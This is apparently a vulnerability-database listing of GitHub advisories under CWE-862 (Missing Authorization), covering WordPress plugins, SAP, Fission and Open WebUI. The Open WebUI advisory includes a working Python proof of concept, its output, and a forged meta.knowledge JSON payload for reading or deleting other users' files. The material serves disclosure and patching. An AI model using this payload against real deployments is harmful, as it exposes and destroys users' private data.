CWE-862
Allowed-with-ReviewMissing Authorization
Abstraction: Class · Status: Incomplete
The product does not perform an authorization check when an actor attempts to access a resource or perform an action.
14609 vulnerabilities reference this CWE, most recent first.
GHSA-VJGV-Q4QP-FR6P
Vulnerability from github – Published: 2024-04-09 21:31 – Updated: 2026-04-08 21:32The Classified Listing – Classified ads & Business Directory Plugin plugin for WordPress is vulnerable to unauthorized access & modification of data due to a missing capability check on the rtcl_import_location() rtcl_import_category() functions in all versions up to, and including, 3.0.4. This makes it possible for authenticated attackers, with subscriber-level access and above, to create terms.
{
"affected": [],
"aliases": [
"CVE-2024-1352"
],
"database_specific": {
"cwe_ids": [
"CWE-862"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-04-09T19:15:16Z",
"severity": "MODERATE"
},
"details": "The Classified Listing \u2013 Classified ads \u0026 Business Directory Plugin plugin for WordPress is vulnerable to unauthorized access \u0026 modification of data due to a missing capability check on the rtcl_import_location() rtcl_import_category() functions in all versions up to, and including, 3.0.4. This makes it possible for authenticated attackers, with subscriber-level access and above, to create terms.",
"id": "GHSA-vjgv-q4qp-fr6p",
"modified": "2026-04-08T21:32:28Z",
"published": "2024-04-09T21:31:57Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1352"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/browser/classified-listing/trunk/app/Controllers/Ajax/Import.php?rev=2824166"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/browser/classified-listing/trunk/app/Controllers/Ajax/Import.php?rev=3061893"
},
{
"type": "WEB",
"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/f5da4cdd-15c7-41a6-be2f-e31bd407ae05?source=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-VJH4-V73G-FC8R
Vulnerability from github – Published: 2024-04-09 03:30 – Updated: 2024-04-09 03:30Cash Management in SAP S/4 HANA does not perform necessary authorization checks for an authenticated user, resulting in escalation of privileges. By exploiting this vulnerability, attacker can add notes in the review request with 'completed' status affecting the integrity of the application. Confidentiality and Availability are not impacted.
{
"affected": [],
"aliases": [
"CVE-2024-30216"
],
"database_specific": {
"cwe_ids": [
"CWE-862"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-04-09T01:15:50Z",
"severity": "MODERATE"
},
"details": "Cash Management in SAP S/4 HANA does not perform necessary authorization checks for an authenticated user, resulting in escalation of privileges. By\u00a0exploiting this vulnerability, attacker can add notes in the review request with \u0027completed\u0027 status affecting the integrity of the application.\u00a0Confidentiality and Availability are not impacted.\n\n",
"id": "GHSA-vjh4-v73g-fc8r",
"modified": "2024-04-09T03:30:53Z",
"published": "2024-04-09T03:30:53Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-30216"
},
{
"type": "WEB",
"url": "https://me.sap.com/notes/3427178"
},
{
"type": "WEB",
"url": "https://support.sap.com/en/my-support/knowledge-base/security-notes-news.html?anchorId=section_370125364"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-VJHC-CF4P-72Q4
Vulnerability from github – Published: 2026-06-30 18:15 – Updated: 2026-06-30 18:15Summary
Fission's buildermgr controller processed Package CRDs without verifying that Package.spec.environment.namespace matched Package.metadata.namespace.
Details
An attacker with packages.fission.io/create in their own namespace could set spec.environment.namespace to any other tenant's namespace. The controller then used its high-privilege service account to fetch the Environment
cross-namespace and dispatch the build command into the victim namespace's builder pod.
The build command's stdout is written verbatim into Package.status.buildlog. By running malicious code through an npm preinstall lifecycle hook (or any equivalent build step), the attacker could read the victim namespace's
fission-builder Bearer token from inside that builder pod and surface it through the build log — then use the leaked token to read every Secret and ConfigMap in the victim namespace.
Impact
Cross-tenant compromise: a package author in one namespace could execute code inside another tenant's builder pod and exfiltrate that namespace's fission-builder service-account token, giving namespace-wide secret and configmap read in
the victim namespace.
Fix
Fixed in #3379 and released in v1.24.0. Two checks in series:
- Admission webhook (
pkg/webhook/package.go::Validate) rejectsPackage.spec.environment.namespace != Package.metadata.namespace. An empty namespace is still accepted; the controllers default it to the package's own namespace. - Controller belt-and-braces: the same check is repeated in
pkg/buildermgr/pkgwatcher.go::buildandpkg/buildermgr/common.go::buildPackagebefore the cross-namespaceEnvironments(...).Getcall, so a stale Package CR or a webhook-bypass cluster (failurePolicy=Ignore) cannot exploit the primitive either.
Behavioural change
Packages that explicitly set spec.environment.namespace to a different namespace are now rejected at admission. Empty-string remains accepted (resolves to the package's own namespace, the same as the prior implicit behaviour).
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 1.23.0"
},
"package": {
"ecosystem": "Go",
"name": "github.com/fission/fission"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.24.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-49821"
],
"database_specific": {
"cwe_ids": [
"CWE-441",
"CWE-862"
],
"github_reviewed": true,
"github_reviewed_at": "2026-06-30T18:15:27Z",
"nvd_published_at": "2026-06-10T18:17:10Z",
"severity": "HIGH"
},
"details": "### Summary\n\nFission\u0027s `buildermgr` controller processed `Package` CRDs without verifying that `Package.spec.environment.namespace` matched `Package.metadata.namespace`.\n\n### Details\n\nAn attacker with `packages.fission.io/create` in their own namespace could set `spec.environment.namespace` to any other tenant\u0027s namespace. The controller then used its high-privilege service account to fetch the Environment\ncross-namespace and dispatch the build command into the **victim namespace\u0027s** builder pod.\n\nThe build command\u0027s stdout is written verbatim into `Package.status.buildlog`. By running malicious code through an npm `preinstall` lifecycle hook (or any equivalent build step), the attacker could read the victim namespace\u0027s\n`fission-builder` Bearer token from inside that builder pod and surface it through the build log \u2014 then use the leaked token to read every Secret and ConfigMap in the victim namespace.\n\n### Impact\n\nCross-tenant compromise: a package author in one namespace could execute code inside another tenant\u0027s builder pod and exfiltrate that namespace\u0027s `fission-builder` service-account token, giving namespace-wide secret and configmap read in\n the victim namespace.\n\n### Fix\n\nFixed in [#3379](https://github.com/fission/fission/pull/3379) and released in [v1.24.0](https://github.com/fission/fission/releases/tag/v1.24.0). Two checks in series:\n\n- **Admission webhook** (`pkg/webhook/package.go::Validate`) rejects `Package.spec.environment.namespace != Package.metadata.namespace`. An empty namespace is still accepted; the controllers default it to the package\u0027s own namespace.\n- **Controller belt-and-braces:** the same check is repeated in `pkg/buildermgr/pkgwatcher.go::build` and `pkg/buildermgr/common.go::buildPackage` before the cross-namespace `Environments(...).Get` call, so a stale Package CR or a\nwebhook-bypass cluster (`failurePolicy=Ignore`) cannot exploit the primitive either.\n\n### Behavioural change\n\nPackages that explicitly set `spec.environment.namespace` to a different namespace are now rejected at admission. Empty-string remains accepted (resolves to the package\u0027s own namespace, the same as the prior implicit behaviour).",
"id": "GHSA-vjhc-cf4p-72q4",
"modified": "2026-06-30T18:15:27Z",
"published": "2026-06-30T18:15:27Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/fission/fission/security/advisories/GHSA-vjhc-cf4p-72q4"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-49821"
},
{
"type": "WEB",
"url": "https://github.com/fission/fission/pull/3379"
},
{
"type": "WEB",
"url": "https://github.com/fission/fission/commit/e2b92663499f4dc3a1e2d38178f39c3c65e0134a"
},
{
"type": "PACKAGE",
"url": "https://github.com/fission/fission"
},
{
"type": "WEB",
"url": "https://github.com/fission/fission/releases/tag/v1.24.0"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "Fission: Cross-namespace Environment reference in Package allows build-time command execution and SA token exfiltration"
}
GHSA-VJHM-VGP3-Q26W
Vulnerability from github – Published: 2022-05-24 17:47 – Updated: 2022-05-24 17:47SAP's HCM Travel Management Fiori Apps V2, version - 608, does not perform proper authorization check, allowing an authenticated but unauthorized attacker to read personnel numbers of employees, resulting in escalation of privileges. However, the attacker can only read some information like last name, first name of the employees, so there is some loss of confidential information, Integrity and Availability are not impacted.
{
"affected": [],
"aliases": [
"CVE-2021-27605"
],
"database_specific": {
"cwe_ids": [
"CWE-862"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2021-04-13T19:15:00Z",
"severity": "MODERATE"
},
"details": "SAP\u0027s HCM Travel Management Fiori Apps V2, version - 608, does not perform proper authorization check, allowing an authenticated but unauthorized attacker to read personnel numbers of employees, resulting in escalation of privileges. However, the attacker can only read some information like last name, first name of the employees, so there is some loss of confidential information, Integrity and Availability are not impacted.",
"id": "GHSA-vjhm-vgp3-q26w",
"modified": "2022-05-24T17:47:17Z",
"published": "2022-05-24T17:47:17Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-27605"
},
{
"type": "WEB",
"url": "https://launchpad.support.sap.com/#/notes/3025054"
},
{
"type": "WEB",
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=573801649"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-VJHR-4RWP-PW28
Vulnerability from github – Published: 2025-12-31 18:30 – Updated: 2026-04-01 18:36Missing Authorization vulnerability in Northern Beaches Websites WP Custom Admin Interface allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP Custom Admin Interface: from n/a through 7.40.
{
"affected": [],
"aliases": [
"CVE-2025-63038"
],
"database_specific": {
"cwe_ids": [
"CWE-862"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-12-31T17:15:48Z",
"severity": "MODERATE"
},
"details": "Missing Authorization vulnerability in Northern Beaches Websites WP Custom Admin Interface allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP Custom Admin Interface: from n/a through 7.40.",
"id": "GHSA-vjhr-4rwp-pw28",
"modified": "2026-04-01T18:36:30Z",
"published": "2025-12-31T18:30:25Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-63038"
},
{
"type": "WEB",
"url": "https://patchstack.com/database/wordpress/plugin/wp-custom-admin-interface/vulnerability/wordpress-wp-custom-admin-interface-plugin-7-40-broken-access-control-vulnerability?_s_id=cve"
},
{
"type": "WEB",
"url": "https://vdp.patchstack.com/database/wordpress/plugin/wp-custom-admin-interface/vulnerability/wordpress-wp-custom-admin-interface-plugin-7-40-broken-access-control-vulnerability?_s_id=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-VJJ3-82Q2-4HV3
Vulnerability from github – Published: 2025-09-22 21:30 – Updated: 2026-04-01 18:36Missing Authorization vulnerability in POSIMYTH Sticky Header Effects for Elementor allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Sticky Header Effects for Elementor: from n/a through 2.1.2.
{
"affected": [],
"aliases": [
"CVE-2025-58251"
],
"database_specific": {
"cwe_ids": [
"CWE-862"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-09-22T19:16:10Z",
"severity": "MODERATE"
},
"details": "Missing Authorization vulnerability in POSIMYTH Sticky Header Effects for Elementor allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Sticky Header Effects for Elementor: from n/a through 2.1.2.",
"id": "GHSA-vjj3-82q2-4hv3",
"modified": "2026-04-01T18:36:15Z",
"published": "2025-09-22T21:30:26Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-58251"
},
{
"type": "WEB",
"url": "https://patchstack.com/database/wordpress/plugin/sticky-header-effects-for-elementor/vulnerability/wordpress-sticky-header-effects-for-elementor-plugin-2-1-2-broken-access-control-vulnerability?_s_id=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-VJQM-6GCC-62CR
Vulnerability from github – Published: 2026-06-17 14:15 – Updated: 2026-06-17 14:15Summary
Open WebUI lets a user who can create, update, or import workspace models store arbitrary meta.knowledge entries on their model without checking whether they own or can read the referenced files. Open WebUI then treats meta.knowledge entries of type file as an authorization source in two places: the built-in view_file tool reads the file's extracted text, and has_access_to_file()'s model branch authorizes the file content and file delete endpoints. A malicious model owner can therefore attach another user's file ID to their model metadata and read or delete that private file.
Impact
Security boundary crossed: file confidentiality and integrity.
An authenticated attacker needs the workspace.models or workspace.models_import permission (or write access to an existing model) and a victim file ID. With those, for a file they do not own and cannot otherwise read, the attacker can:
- read the file's extracted text (up to
100000characters perview_filecall fromfile.data.content), - read the file's content via
GET /api/v1/files/{id}/content, and - delete the file via
DELETE /api/v1/files/{id}.
Root Cause
ModelMeta allows extra metadata fields and ModelForm accepts that metadata without a validator for meta.knowledge file access:
# backend/open_webui/models/models.py
class ModelForm(BaseModel):
model_config = ConfigDict(extra='ignore')
id: str
base_model_id: Optional[str] = None
name: str
meta: ModelMeta
params: ModelParams
Model creation only checks the caller's model-workspace permission and then stores the form data:
# backend/open_webui/routers/models.py
if user.role != 'admin' and not await has_permission(
user.id, 'workspace.models', request.app.state.config.USER_PERMISSIONS, db=db
):
raise HTTPException(...)
model = await Models.insert_new_model(form_data, user.id, db=db)
The insert sink persists the supplied meta:
# backend/open_webui/models/models.py
result = Model(
**{
**form_data.model_dump(exclude={'access_grants'}),
'user_id': user_id,
...
}
)
When built-in tools are assembled, meta.knowledge is passed through as __model_knowledge__, and any file entry enables view_file:
# backend/open_webui/utils/tools.py
model_knowledge = model.get('info', {}).get('meta', {}).get('knowledge', [])
...
knowledge_types = {item.get('type') for item in model_knowledge}
if 'file' in knowledge_types or 'collection' in knowledge_types:
builtin_functions.append(view_file)
view_file treats matching __model_knowledge__ file IDs as authorization, before has_access_to_file():
# backend/open_webui/tools/builtin.py
if (
file.user_id != user_id
and user_role != 'admin'
and not any(
item.get('type') == 'file' and item.get('id') == file_id for item in (__model_knowledge__ or [])
)
and not await has_access_to_file(...)
):
return json.dumps({'error': 'File not found'})
The same forged meta.knowledge is also trusted outside the tool path. has_access_to_file() iterates the caller's accessible models and returns true when a model's meta.knowledge contains the requested file ID:
# backend/open_webui/utils/access_control/files.py
for model in await Models.get_models_by_user_id(user.id, permission=access_type, db=db):
knowledge_items = getattr(model.meta, 'knowledge', None) or []
for item in knowledge_items:
if isinstance(item, dict) and item.get('type') == 'file' and item.get('id') == file.id:
return True
This branch is not restricted to read, so it also satisfies the write check that DELETE /api/v1/files/{id} performs. The same missing validation applies to the import path (POST /api/v1/models/import) and the update path, not only create.
PoC
#!/usr/bin/env python3
"""
Verifier for forged model meta.knowledge file entries reaching builtin tools.
The proof executes:
- the real Models.insert_new_model() sink with a forged meta.knowledge entry
- the real builtin view_file() authorization branch
Fake DB/model adapters are used only to avoid requiring a live Open WebUI
server. The security-sensitive code under test is Open WebUI application code.
"""
from __future__ import annotations
import asyncio
import ast
import json
import os
import sys
import types
from pathlib import Path
from types import SimpleNamespace
REPO = Path(__file__).resolve().parents[1]
BUILTIN_TOOLS = REPO / "backend/open_webui/tools/builtin.py"
def prepare_imports() -> None:
sys.path.insert(0, str(REPO / "backend"))
os.environ["VECTOR_DB"] = "none"
class DummyTyper:
def command(self, *args, **kwargs):
return lambda fn: fn
sys.modules.setdefault(
"typer",
types.SimpleNamespace(
Typer=lambda *args, **kwargs: DummyTyper(),
Option=lambda *args, **kwargs: None,
echo=lambda *args, **kwargs: None,
Exit=Exception,
),
)
sys.modules.setdefault("uvicorn", types.SimpleNamespace(run=lambda *args, **kwargs: None))
class FakeDb:
def __init__(self):
self.added = []
self.committed = False
self.refreshed = False
def add(self, row):
self.added.append(row)
async def commit(self):
self.committed = True
async def refresh(self, row):
self.refreshed = True
class FakeDbContext:
def __init__(self, db):
self.db = db
async def __aenter__(self):
return self.db
async def __aexit__(self, exc_type, exc, tb):
return False
async def verify_model_insert_accepts_victim_file(victim_file_id: str):
import open_webui.models.models as models_module
fake_db = FakeDb()
original_context = models_module.get_async_db_context
original_set_grants = models_module.AccessGrants.set_access_grants
original_to_model = models_module.Models._to_model_model
async def fake_set_access_grants(*args, **kwargs):
return True
async def fake_to_model(self, model, access_grants=None, db=None):
return SimpleNamespace(
id=model.id,
user_id=model.user_id,
base_model_id=model.base_model_id,
name=model.name,
params=model.params,
meta=model.meta,
access_grants=[],
is_active=model.is_active,
created_at=model.created_at,
updated_at=model.updated_at,
)
try:
models_module.get_async_db_context = lambda db=None: FakeDbContext(fake_db)
models_module.AccessGrants.set_access_grants = fake_set_access_grants
models_module.Models._to_model_model = types.MethodType(fake_to_model, models_module.Models)
inserted = await models_module.Models.insert_new_model(
models_module.ModelForm(
id="attacker-model",
base_model_id="gpt-vision-base",
name="Attacker Model",
params={},
meta={
"knowledge": [
{
"id": victim_file_id,
"type": "file",
"name": "victim-private.txt",
}
],
"builtinTools": {"knowledge": True},
},
),
user_id="attacker",
)
finally:
models_module.get_async_db_context = original_context
models_module.AccessGrants.set_access_grants = original_set_grants
models_module.Models._to_model_model = original_to_model
stored_meta = [getattr(row, "meta", None) for row in fake_db.added]
stored_knowledge_ids = [
item.get("id")
for meta in stored_meta
for item in ((meta or {}).get("knowledge") or [])
]
return {
"insert_returned_model": bool(inserted),
"db_commit_called": fake_db.committed,
"stored_user_ids": [getattr(row, "user_id", None) for row in fake_db.added],
"stored_model_ids": [getattr(row, "id", None) for row in fake_db.added],
"stored_knowledge_file_ids": stored_knowledge_ids,
}
async def verify_view_file_trusts_model_knowledge(victim_file_id: str):
class FakeFiles:
looked_up_ids = []
async def get_file_by_id(self, file_id, db=None):
self.looked_up_ids.append(file_id)
if file_id == victim_file_id:
return SimpleNamespace(
id=victim_file_id,
user_id="victim",
filename="victim-private.txt",
data={"content": "PRIVATE_MODEL_KNOWLEDGE_SECRET"},
created_at=1,
updated_at=2,
)
return None
async def fake_has_access_to_file(file_id, access_type, user, db=None):
return False
class FakeUserModel:
def __init__(self, **kwargs):
self.__dict__.update(kwargs)
fake_files = FakeFiles()
fake_files_module = types.SimpleNamespace(Files=fake_files)
fake_file_acl_module = types.SimpleNamespace(has_access_to_file=fake_has_access_to_file)
original_files_module = sys.modules.get("open_webui.models.files")
original_acl_module = sys.modules.get("open_webui.utils.access_control.files")
try:
sys.modules["open_webui.models.files"] = fake_files_module
sys.modules["open_webui.utils.access_control.files"] = fake_file_acl_module
source = BUILTIN_TOOLS.read_text(encoding="utf-8")
tree = ast.parse(source, filename=str(BUILTIN_TOOLS))
selected = [
node
for node in tree.body
if isinstance(node, ast.AsyncFunctionDef) and node.name == "view_file"
]
if len(selected) != 1:
raise RuntimeError("could not find view_file")
module = ast.Module(body=selected, type_ignores=[])
ast.fix_missing_locations(module)
ns = {
"json": json,
"Optional": __import__("typing").Optional,
"Request": object,
"UserModel": FakeUserModel,
"log": SimpleNamespace(exception=lambda *args, **kwargs: None),
"MAX_VIEW_FILE_CHARS": 100_000,
"DEFAULT_VIEW_FILE_MAX_CHARS": 10_000,
}
exec(compile(module, str(BUILTIN_TOOLS), "exec"), ns)
view_file = ns["view_file"]
denied_without_model_knowledge = await view_file(
victim_file_id,
__request__=SimpleNamespace(),
__user__={"id": "attacker", "role": "user", "name": "attacker", "email": "a@example.test"},
__model_knowledge__=[],
)
allowed_with_model_knowledge = await view_file(
victim_file_id,
__request__=SimpleNamespace(),
__user__={"id": "attacker", "role": "user", "name": "attacker", "email": "a@example.test"},
__model_knowledge__=[{"id": victim_file_id, "type": "file"}],
)
finally:
if original_files_module is not None:
sys.modules["open_webui.models.files"] = original_files_module
else:
sys.modules.pop("open_webui.models.files", None)
if original_acl_module is not None:
sys.modules["open_webui.utils.access_control.files"] = original_acl_module
else:
sys.modules.pop("open_webui.utils.access_control.files", None)
denied = json.loads(denied_without_model_knowledge)
allowed = json.loads(allowed_with_model_knowledge)
return {
"file_ids_looked_up": fake_files.looked_up_ids,
"without_model_knowledge": denied,
"with_forged_model_knowledge": allowed,
"private_content_disclosed": allowed.get("content") == "PRIVATE_MODEL_KNOWLEDGE_SECRET",
}
async def main() -> None:
prepare_imports()
victim_file_id = "victim-private-file"
insert_sink = await verify_model_insert_accepts_victim_file(victim_file_id)
tool_read = await verify_view_file_trusts_model_knowledge(victim_file_id)
result = {
"confirmed": (
insert_sink["insert_returned_model"] is True
and insert_sink["stored_user_ids"] == ["attacker"]
and insert_sink["stored_knowledge_file_ids"] == [victim_file_id]
and tool_read["without_model_knowledge"].get("error") == "File not found"
and tool_read["private_content_disclosed"] is True
),
"attacker_user_id": "attacker",
"victim_user_id": "victim",
"victim_file_id": victim_file_id,
"attacker_owns_file": False,
"model_insert_sink": insert_sink,
"tool_read": tool_read,
"source": {
"insert_sink": "backend/open_webui/models/models.py:Models.insert_new_model",
"tool_injection": "backend/open_webui/utils/tools.py:get_builtin_tools passes model meta.knowledge as __model_knowledge__",
"read_sink": "backend/open_webui/tools/builtin.py:view_file",
},
}
print(json.dumps(result, indent=2, sort_keys=True))
if not result["confirmed"]:
raise SystemExit(1)
if __name__ == "__main__":
asyncio.run(main())
The PoC executes the real Models.insert_new_model() sink and the real view_file() authorization branch with fake database/file adapters. It first confirms that the attacker-owned model stores a forged victim file ID in meta.knowledge, then confirms view_file() denies the same victim file without model knowledge but discloses content when the forged model knowledge entry is present.
Result:
{
"attacker_owns_file": false,
"attacker_user_id": "attacker",
"confirmed": true,
"model_insert_sink": {
"db_commit_called": true,
"insert_returned_model": true,
"stored_knowledge_file_ids": [
"victim-private-file"
],
"stored_model_ids": [
"attacker-model"
],
"stored_user_ids": [
"attacker"
]
},
"tool_read": {
"private_content_disclosed": true,
"with_forged_model_knowledge": {
"content": "PRIVATE_MODEL_KNOWLEDGE_SECRET",
"filename": "victim-private.txt",
"id": "victim-private-file"
},
"without_model_knowledge": {
"error": "File not found"
}
},
"victim_file_id": "victim-private-file",
"victim_user_id": "victim"
}
Exploit Sketch
- Attacker has permission to create or update workspace models.
- Attacker creates a model with:
{
"meta": {
"knowledge": [
{
"id": "VICTIM_FILE_ID",
"type": "file",
"name": "victim-private.txt"
}
],
"builtinTools": {
"knowledge": true
}
}
}
- Attacker chats with that model using native/built-in tools and invokes
view_fileforVICTIM_FILE_ID. - The tool returns the victim file's extracted text content despite the attacker not owning or otherwise having access to the file.
Recommended Fix
Validate meta.knowledge on every model write path: create, update, and import. For entries with type == "file", require direct ownership, admin role, or has_access_to_file(file_id, 'read', user, db=db) before storing the entry. Validate the import payload before its surrounding try/except so a rejection surfaces as 403, not 500.
Do not let view_file() treat __model_knowledge__ as an authorization bypass; it should still enforce ownership/admin/has_access_to_file() per file ID. File deletion should require ownership, admin, or explicit write/delete access, not a read-derived model association.
Consolidation
Per our Report Handling policy this consolidates independent reports of the same model meta.knowledge file-ID laundering flaw:
- Read via forged
meta.knowledgeon model create, through the built-inview_filetool: @0xEr3n (earliest filing). - Distinct paths demonstrated by @5yu4n: the import endpoint (
POST /api/v1/models/import), and cross-user read and deletion through the file API (GET/DELETE /api/v1/files/{id}) viahas_access_to_file()'s model branch.
Fix validates meta.knowledge ownership on create, update, and import; blocking the forged entry closes both read and delete. One CVE for the consolidated advisory.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 0.9.5"
},
"package": {
"ecosystem": "PyPI",
"name": "open-webui"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.9.6"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-54012"
],
"database_specific": {
"cwe_ids": [
"CWE-284",
"CWE-285",
"CWE-862"
],
"github_reviewed": true,
"github_reviewed_at": "2026-06-17T14:15:33Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "## Summary\n\nOpen WebUI lets a user who can create, update, or import workspace models store arbitrary `meta.knowledge` entries on their model without checking whether they own or can read the referenced files. Open WebUI then treats `meta.knowledge` entries of type `file` as an authorization source in two places: the built-in `view_file` tool reads the file\u0027s extracted text, and `has_access_to_file()`\u0027s model branch authorizes the file content and file delete endpoints. A malicious model owner can therefore attach another user\u0027s file ID to their model metadata and read or delete that private file.\n\n## Impact\n\nSecurity boundary crossed: file confidentiality and integrity.\n\nAn authenticated attacker needs the `workspace.models` or `workspace.models_import` permission (or write access to an existing model) and a victim file ID. With those, for a file they do not own and cannot otherwise read, the attacker can:\n\n- read the file\u0027s extracted text (up to `100000` characters per `view_file` call from `file.data.content`),\n- read the file\u0027s content via `GET /api/v1/files/{id}/content`, and\n- delete the file via `DELETE /api/v1/files/{id}`.\n\n## Root Cause\n\n`ModelMeta` allows extra metadata fields and `ModelForm` accepts that metadata without a validator for `meta.knowledge` file access:\n\n```python\n# backend/open_webui/models/models.py\nclass ModelForm(BaseModel):\n model_config = ConfigDict(extra=\u0027ignore\u0027)\n\n id: str\n base_model_id: Optional[str] = None\n name: str\n meta: ModelMeta\n params: ModelParams\n```\n\nModel creation only checks the caller\u0027s model-workspace permission and then stores the form data:\n\n```python\n# backend/open_webui/routers/models.py\nif user.role != \u0027admin\u0027 and not await has_permission(\n user.id, \u0027workspace.models\u0027, request.app.state.config.USER_PERMISSIONS, db=db\n):\n raise HTTPException(...)\n\nmodel = await Models.insert_new_model(form_data, user.id, db=db)\n```\n\nThe insert sink persists the supplied `meta`:\n\n```python\n# backend/open_webui/models/models.py\nresult = Model(\n **{\n **form_data.model_dump(exclude={\u0027access_grants\u0027}),\n \u0027user_id\u0027: user_id,\n ...\n }\n)\n```\n\nWhen built-in tools are assembled, `meta.knowledge` is passed through as `__model_knowledge__`, and any `file` entry enables `view_file`:\n\n```python\n# backend/open_webui/utils/tools.py\nmodel_knowledge = model.get(\u0027info\u0027, {}).get(\u0027meta\u0027, {}).get(\u0027knowledge\u0027, [])\n...\nknowledge_types = {item.get(\u0027type\u0027) for item in model_knowledge}\nif \u0027file\u0027 in knowledge_types or \u0027collection\u0027 in knowledge_types:\n builtin_functions.append(view_file)\n```\n\n`view_file` treats matching `__model_knowledge__` file IDs as authorization, before `has_access_to_file()`:\n\n```python\n# backend/open_webui/tools/builtin.py\nif (\n file.user_id != user_id\n and user_role != \u0027admin\u0027\n and not any(\n item.get(\u0027type\u0027) == \u0027file\u0027 and item.get(\u0027id\u0027) == file_id for item in (__model_knowledge__ or [])\n )\n and not await has_access_to_file(...)\n):\n return json.dumps({\u0027error\u0027: \u0027File not found\u0027})\n```\n\nThe same forged `meta.knowledge` is also trusted outside the tool path. `has_access_to_file()` iterates the caller\u0027s accessible models and returns true when a model\u0027s `meta.knowledge` contains the requested file ID:\n\n```python\n# backend/open_webui/utils/access_control/files.py\nfor model in await Models.get_models_by_user_id(user.id, permission=access_type, db=db):\n knowledge_items = getattr(model.meta, \u0027knowledge\u0027, None) or []\n for item in knowledge_items:\n if isinstance(item, dict) and item.get(\u0027type\u0027) == \u0027file\u0027 and item.get(\u0027id\u0027) == file.id:\n return True\n```\n\nThis branch is not restricted to read, so it also satisfies the `write` check that `DELETE /api/v1/files/{id}` performs. The same missing validation applies to the import path (`POST /api/v1/models/import`) and the update path, not only create.\n\n## PoC\n\n```python\n#!/usr/bin/env python3\n\"\"\"\nVerifier for forged model meta.knowledge file entries reaching builtin tools.\n\nThe proof executes:\n - the real Models.insert_new_model() sink with a forged meta.knowledge entry\n - the real builtin view_file() authorization branch\n\nFake DB/model adapters are used only to avoid requiring a live Open WebUI\nserver. The security-sensitive code under test is Open WebUI application code.\n\"\"\"\n\nfrom __future__ import annotations\n\nimport asyncio\nimport ast\nimport json\nimport os\nimport sys\nimport types\nfrom pathlib import Path\nfrom types import SimpleNamespace\n\nREPO = Path(__file__).resolve().parents[1]\nBUILTIN_TOOLS = REPO / \"backend/open_webui/tools/builtin.py\"\n\n\ndef prepare_imports() -\u003e None:\n sys.path.insert(0, str(REPO / \"backend\"))\n os.environ[\"VECTOR_DB\"] = \"none\"\n\n class DummyTyper:\n def command(self, *args, **kwargs):\n return lambda fn: fn\n\n sys.modules.setdefault(\n \"typer\",\n types.SimpleNamespace(\n Typer=lambda *args, **kwargs: DummyTyper(),\n Option=lambda *args, **kwargs: None,\n echo=lambda *args, **kwargs: None,\n Exit=Exception,\n ),\n )\n sys.modules.setdefault(\"uvicorn\", types.SimpleNamespace(run=lambda *args, **kwargs: None))\n\n\nclass FakeDb:\n def __init__(self):\n self.added = []\n self.committed = False\n self.refreshed = False\n\n def add(self, row):\n self.added.append(row)\n\n async def commit(self):\n self.committed = True\n\n async def refresh(self, row):\n self.refreshed = True\n\n\nclass FakeDbContext:\n def __init__(self, db):\n self.db = db\n\n async def __aenter__(self):\n return self.db\n\n async def __aexit__(self, exc_type, exc, tb):\n return False\n\n\nasync def verify_model_insert_accepts_victim_file(victim_file_id: str):\n import open_webui.models.models as models_module\n\n fake_db = FakeDb()\n original_context = models_module.get_async_db_context\n original_set_grants = models_module.AccessGrants.set_access_grants\n original_to_model = models_module.Models._to_model_model\n\n async def fake_set_access_grants(*args, **kwargs):\n return True\n\n async def fake_to_model(self, model, access_grants=None, db=None):\n return SimpleNamespace(\n id=model.id,\n user_id=model.user_id,\n base_model_id=model.base_model_id,\n name=model.name,\n params=model.params,\n meta=model.meta,\n access_grants=[],\n is_active=model.is_active,\n created_at=model.created_at,\n 